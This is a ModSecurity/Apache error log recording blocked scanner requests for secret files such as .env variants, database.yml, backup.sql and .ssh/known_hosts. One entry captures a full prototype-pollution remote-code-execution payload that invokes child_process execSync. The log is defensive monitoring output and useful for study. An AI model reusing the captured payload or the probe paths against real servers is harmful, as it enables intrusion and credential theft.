[Sat Dec 13 14:35:52.497151 2025] [:error] [pid 714745] [client 62.60.131.73:61340] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aT1ruK7he51rbo1RuLjq1wAAACo"]
[Sat Dec 13 14:35:52.497341 2025] [:error] [pid 714745] [client 62.60.131.73:61340] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aT1ruK7he51rbo1RuLjq1wAAACo"]
[Sat Dec 13 14:35:52.522847 2025] [authz_core:error] [pid 714743] [client 62.60.131.73:58787] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/lib
[Sat Dec 13 14:35:52.546880 2025] [:error] [pid 714749] [client 62.60.131.73:63373] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.project"] [unique_id "aT1ruEqTEAanHMmLjWGUrgAAAC4"]
[Sat Dec 13 14:35:52.547109 2025] [:error] [pid 714749] [client 62.60.131.73:63373] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.project"] [unique_id "aT1ruEqTEAanHMmLjWGUrgAAAC4"]
[Sat Dec 13 14:35:52.547303 2025] [:error] [pid 714749] [client 62.60.131.73:63373] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.project"] [unique_id "aT1ruEqTEAanHMmLjWGUrgAAAC4"]
[Sat Dec 13 14:35:52.552692 2025] [:error] [pid 714751] [client 62.60.131.73:62347] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database.yml"] [unique_id "aT1ruOsfo6hT02lqELxIywAAADA"]
[Sat Dec 13 14:35:52.552923 2025] [:error] [pid 714751] [client 62.60.131.73:62347] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.yml"] [unique_id "aT1ruOsfo6hT02lqELxIywAAADA"]
[Sat Dec 13 14:35:52.553130 2025] [:error] [pid 714751] [client 62.60.131.73:62347] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.yml"] [unique_id "aT1ruOsfo6hT02lqELxIywAAADA"]
[Sat Dec 13 14:35:52.559450 2025] [:error] [pid 714753] [client 62.60.131.73:55061] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aT1ruKss72voYOfYLdcUHQAAADI"]
[Sat Dec 13 14:35:52.559717 2025] [:error] [pid 714753] [client 62.60.131.73:55061] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aT1ruKss72voYOfYLdcUHQAAADI"]
[Sat Dec 13 14:35:52.559901 2025] [:error] [pid 714753] [client 62.60.131.73:55061] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aT1ruKss72voYOfYLdcUHQAAADI"]
[Sat Dec 13 14:35:52.576251 2025] [:error] [pid 714759] [client 62.60.131.73:53108] [client 62.60.131.73] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/*.old"] [unique_id "aT1ruJrP8uQZBAk2CmYfnQAAADg"]
[Sat Dec 13 14:35:52.576533 2025] [:error] [pid 714759] [client 62.60.131.73:53108] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/*.old"] [unique_id "aT1ruJrP8uQZBAk2CmYfnQAAADg"]
[Sat Dec 13 14:35:52.576714 2025] [:error] [pid 714759] [client 62.60.131.73:53108] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/*.old"] [unique_id "aT1ruJrP8uQZBAk2CmYfnQAAADg"]
[Sat Dec 13 14:35:52.588018 2025] [:error] [pid 714765] [client 62.60.131.73:63682] [client 62.60.131.73] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aT1ruJJVi1JrnrTXCB0NtAAAAD4"]
[Sat Dec 13 14:35:52.588350 2025] [:error] [pid 714765] [client 62.60.131.73:63682] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aT1ruJJVi1JrnrTXCB0NtAAAAD4"]
[Sat Dec 13 14:35:52.588544 2025] [:error] [pid 714765] [client 62.60.131.73:63682] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aT1ruJJVi1JrnrTXCB0NtAAAAD4"]
[Sat Dec 13 14:35:52.599436 2025] [authz_core:error] [pid 714773] [client 62.60.131.73:53615] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sat Dec 13 14:35:52.599573 2025] [:error] [pid 714769] [client 62.60.131.73:55813] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.dist"] [unique_id "aT1ruDpRlMYfNZtRWFNQiwAAAEI"]
[Sat Dec 13 14:35:52.599814 2025] [:error] [pid 714769] [client 62.60.131.73:55813] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.dist"] [unique_id "aT1ruDpRlMYfNZtRWFNQiwAAAEI"]
[Sat Dec 13 14:35:52.600008 2025] [:error] [pid 714769] [client 62.60.131.73:55813] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.dist"] [unique_id "aT1ruDpRlMYfNZtRWFNQiwAAAEI"]
[Sat Dec 13 14:35:52.601675 2025] [:error] [pid 714774] [client 62.60.131.73:55901] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.docker"] [unique_id "aT1ruM5EHtRFCqBUuu_C4QAAAEc"]
[Sat Dec 13 14:35:52.601895 2025] [:error] [pid 714774] [client 62.60.131.73:55901] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.docker"] [unique_id "aT1ruM5EHtRFCqBUuu_C4QAAAEc"]
[Sat Dec 13 14:35:52.602060 2025] [:error] [pid 714774] [client 62.60.131.73:55901] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.docker"] [unique_id "aT1ruM5EHtRFCqBUuu_C4QAAAEc"]
[Sat Dec 13 14:35:52.813415 2025] [:error] [pid 714749] [client 62.60.131.73:49742] [client 62.60.131.73] ModSecurity: Warning. Matched phrase ".ssh/known_hosts" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/known_hosts found within REQUEST_FILENAME: /.ssh/known_hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/known_hosts"] [unique_id "aT1ruEqTEAanHMmLjWGUrwAAAC4"]
[Sat Dec 13 14:35:52.813672 2025] [:error] [pid 714749] [client 62.60.131.73:49742] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/known_hosts"] [unique_id "aT1ruEqTEAanHMmLjWGUrwAAAC4"]
[Sat Dec 13 14:35:52.813861 2025] [:error] [pid 714749] [client 62.60.131.73:49742] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/known_hosts"] [unique_id "aT1ruEqTEAanHMmLjWGUrwAAAC4"]
[Sat Dec 13 14:35:52.952683 2025] [:error] [pid 714763] [client 62.60.131.73:52859] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/beta/.env"] [unique_id "aT1ruDcTDEwp9bh15pzcoQAAADw"]
[Sat Dec 13 14:35:52.952957 2025] [:error] [pid 714763] [client 62.60.131.73:52859] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/beta/.env"] [unique_id "aT1ruDcTDEwp9bh15pzcoQAAADw"]
[Sat Dec 13 14:35:52.953256 2025] [:error] [pid 714763] [client 62.60.131.73:52859] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/beta/.env"] [unique_id "aT1ruDcTDEwp9bh15pzcoQAAADw"]
[Sat Dec 13 18:51:43.865394 2025] [:error] [pid 714745] [client 128.199.143.161:41718] [client 128.199.143.161] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(id).tostring().trim().replace(/n/g | ) throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aT2nr67he51rbo1RuLjq6wAAACo"]
[Sat Dec 13 18:51:43.866963 2025] [:error] [pid 714745] [client 128.199.143.161:41718] [client 128.199.143.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aT2nr67he51rbo1RuLjq6wAAACo"]
[Sat Dec 13 18:51:43.867153 2025] [:error] [pid 714745] [client 128.199.143.161:41718] [client 128.199.143.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aT2nr67he51rbo1RuLjq6wAAACo"]
[Sat Dec 13 20:13:21.408716 2025] [:error] [pid 714743] [client 204.76.203.25:60472] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT260dY8fd3zcttc7cO3YgAAACg"]
[Sat Dec 13 20:13:21.409074 2025] [:error] [pid 714743] [client 204.76.203.25:60472] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT260dY8fd3zcttc7cO3YgAAACg"]
[Sat Dec 13 20:13:21.409271 2025] [:error] [pid 714743] [client 204.76.203.25:60472] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT260dY8fd3zcttc7cO3YgAAACg"]
[Sun Dec 14 01:32:59.747953 2025] [authz_core:error] [pid 723486] [client 209.97.180.8:60606] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Dec 14 01:33:02.748267 2025] [:error] [pid 723527] [client 209.97.180.8:60638] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aT4FviCA6R_1-Yl_WssqHgAAAAE"]
[Sun Dec 14 01:33:02.748604 2025] [:error] [pid 723527] [client 209.97.180.8:60638] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aT4FviCA6R_1-Yl_WssqHgAAAAE"]
[Sun Dec 14 01:33:02.748866 2025] [:error] [pid 723527] [client 209.97.180.8:60638] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aT4FviCA6R_1-Yl_WssqHgAAAAE"]
